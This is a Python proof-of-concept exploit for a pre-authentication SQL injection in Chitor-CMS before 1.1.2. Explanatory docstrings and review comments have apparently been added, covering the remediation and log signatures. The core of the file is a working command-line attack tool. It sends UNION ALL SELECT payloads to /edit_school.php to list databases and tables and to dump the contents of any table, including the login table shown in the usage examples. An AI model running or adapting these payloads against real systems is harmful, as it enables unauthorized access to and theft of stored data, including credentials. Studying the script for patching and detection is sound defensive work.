#!/usr/bin/python3
#######################################################
#                                                     #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection
# Date: 2023/04/13
# Exploit Author: msd0pe
# Project: https://github.com/waqaskanju/Chitor-CMS
# My Github: https://github.com/msd0pe-1
# Patched the 2023/04/16: 69d3442 commit
#                                                     #
#######################################################
"""Proof of concept for a pre-auth SQL injection in Chitor-CMS < 1.1.2.

Every request in this file places an attacker-controlled value in the ``id``
query parameter of ``/edit_school.php``; the technique only works because the
application builds its SQL statement from that value without binding it (the
header above says the project fixed this in commit 69d3442).  The standard
remediation is a prepared statement with ``id`` bound as an integer, plus
rejecting non-numeric ids before any query text is assembled.

Notes for defenders reviewing web-server logs: each probe carries literal
``UNION ALL SELECT`` / ``INFORMATION_SCHEMA`` text in the query string, asks
the server to echo the fixed markers ``qpzkq`` / ``qjkbq`` / ``xzmdpl`` (the
0x-encoded constants in the payloads), and sends a User-Agent that lacks the
usual ``Mozilla/`` prefix.  A patched target returns no markers, and this
script then prints an empty table rather than an error.
"""

__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'


class bcolors:
    """ANSI escape sequences used to colour terminal output."""
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    OCRA = '\033[93m'
    RED = '\033[91m'
    CYAN = '\033[96m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class infos:
    """Coloured status prefixes for console messages.

    Each prefix closes with two ENDC codes because a colour and BOLD are
    both opened; only PROCESS is referenced elsewhere in this file.
    """
    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "


# NOTE(review): imports belong at the top of the module (PEP 8); they are
# left where the author placed them.  `requests` and `prettytable` are
# third-party dependencies.
import re
import requests
import optparse
from prettytable import PrettyTable


def DumpTable(url: str, database: str, table: str) -> None:
    """Print every row of ``database.table`` from the target as a PrettyTable.

    Two requests are made: the first reads the column names of the table from
    INFORMATION_SCHEMA.COLUMNS, the second selects those columns from the
    table itself.  Each response is parsed by locating the ``qpzkq[...]qjkbq``
    markers in the HTML; the cells of one row are joined with ``xzmdpl``.

    Args:
        url: Base URL of the target (``/edit_school.php`` is appended).
        database: Schema name, interpolated into the query text unescaped.
        table: Table name, interpolated into the query text unescaped.

    Returns:
        None; the table is printed to stdout.  Errors from the first request
        are swallowed; a ValueError from the second triggers a retry with
        padded rows, anything else propagates to the caller.
    """
    # NOTE: the User-Agent lacks the usual "Mozilla/" prefix, which makes
    # this tool's traffic easy to single out in access logs.
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    columns = []
    # 0x71707a6b71 = "qpzkq", 0x787a6d64706c = "xzmdpl", 0x716a6b6271 = "qjkbq":
    # fixed marker strings the server is asked to echo so the regex below can
    # find the result inside the page.  `table` and `database` are embedded
    # unescaped, so a name containing a double quote breaks the query.
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
    u = requests.get(url + payload, headers=header)
    try:
        # NOTE(review): the pattern is not a raw string; "\[" is an invalid
        # escape that newer interpreters warn about.
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        # r[0] raises IndexError when the markers are absent (patched target
        # or query error); the bare except below swallows it, `columns` stays
        # empty, and an empty table is printed instead of an error.
        r = r[0].replace('\"',"").split(',')
        # NOTE(review): str.split never returns [], so this branch is dead.
        if r == []:
            pass
        else:
            for i in r:
                columns.append(i)
        pass
    except:
        pass
    x.field_names = columns
    # str(columns) is stripped back down to a bare comma-separated column
    # list for CONCAT_WS.  NOTE(review): this repr-stripping mangles column
    # names that themselves contain brackets, quotes or spaces.
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        # NOTE(review): splitting on ',' also splits any cell value that
        # contains a comma, since the JSON array is not actually parsed.
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                x.add_rows([i])
    except ValueError:
        # add_rows raised because a row's cell count did not match
        # field_names (presumably a trailing empty cell dropped by CONCAT_WS
        # — verify); every row is re-parsed with one empty cell appended.
        # NOTE(review): rows added to `x` before the failing one are not
        # removed, so they are printed twice.  Any other exception here,
        # including IndexError from an empty match list, propagates to Main.
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                i.append("")
                x.add_rows([i])
    print(x)


def ListTables(url: str, database: str) -> None:
    """Print the table names of ``database`` on the target.

    Args:
        url: Base URL of the target (``/edit_school.php`` is appended).
        database: Schema name; it is hex-encoded before being embedded, so
            unlike DumpTable this function does not break on quotes.

    Returns:
        None; a one-column PrettyTable is printed.  Parsing errors (including
        the absence of the markers on a patched target) are swallowed and an
        empty table is printed.
    """
    # NOTE: same non-standard User-Agent as DumpTable (no "Mozilla/" prefix).
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["TABLES"]
    # Marker constants as in DumpTable; the schema name is passed as a hex
    # literal via str.encode().hex().
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        # IndexError here (no markers in the response) is swallowed below.
        r = r[0].replace('\"',"").split(',')
        # NOTE(review): str.split never returns [], so this branch is dead.
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def ListDatabases(url: str) -> None:
    """Print every schema name visible to the application's DB account.

    Args:
        url: Base URL of the target (``/edit_school.php`` is appended).

    Returns:
        None; a one-column PrettyTable is printed.  Parsing errors (including
        the absence of the markers on a patched target) are swallowed and an
        empty table is printed.
    """
    # NOTE: same non-standard User-Agent as DumpTable (no "Mozilla/" prefix).
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["DATABASES"]
    # Marker constants as in DumpTable; no user-supplied text is embedded.
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        # IndexError here (no markers in the response) is swallowed below.
        r = r[0].replace('\"',"").split(',')
        # NOTE(review): str.split never returns [], so this branch is dead.
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def Main() -> None:
    """Parse the command line and dispatch to the List*/Dump helpers.

    With no options (or any positional argument) the help text is printed.
    Otherwise ``--dbs`` lists schemas, ``-D ... --tables`` lists tables and
    ``-D ... -T ... --dump`` dumps one table; several can be combined in one
    run and execute in that order.
    """
    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
    (options, args) = Menu.parse_args()
    # NOTE(review): the Examples group is registered after parse_args(), so
    # `-h/--help` (handled inside parse_args) never shows it; it only appears
    # in the explicit print_help() call below.
    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
    Menu.add_option_group(Examples)
    # optparse.Values compares equal to a dict holding its attributes, so
    # this detects "no option given at all".
    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
        Menu.print_help()
        print('')
        print('%s' % __description__)
        print('Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
        print('Any malicious or illegal activity may be punishable by law')
        print('Use at your own risk')
    elif len(args) == 0:
        try:
            # `url` is used verbatim; no scheme/trailing-slash normalisation.
            if options.url != None:
                if options.l_databases != None:
                    ListDatabases(options.url)
                if options.database != None:
                    if options.l_tables != None:
                        ListTables(options.url, options.database)
                    if options.table != None:
                        if options.dump != None:
                            DumpTable(options.url, options.database, options.table)
        except:
            # NOTE(review): a bare except also catches KeyboardInterrupt, so
            # Ctrl-C during a request prints this instead of reaching the
            # handler in __main__; connection errors and the IndexError from
            # DumpTable's retry path all end up here with no detail.
            print("Unexpected error")


if __name__ == '__main__':
    try:
        Main()
    except KeyboardInterrupt:
        print()
        print(infos.PROCESS + "Exiting...")
        print()
        # NOTE(review): builtin exit() is installed by the site module;
        # sys.exit(1) is the portable form.
        exit(1)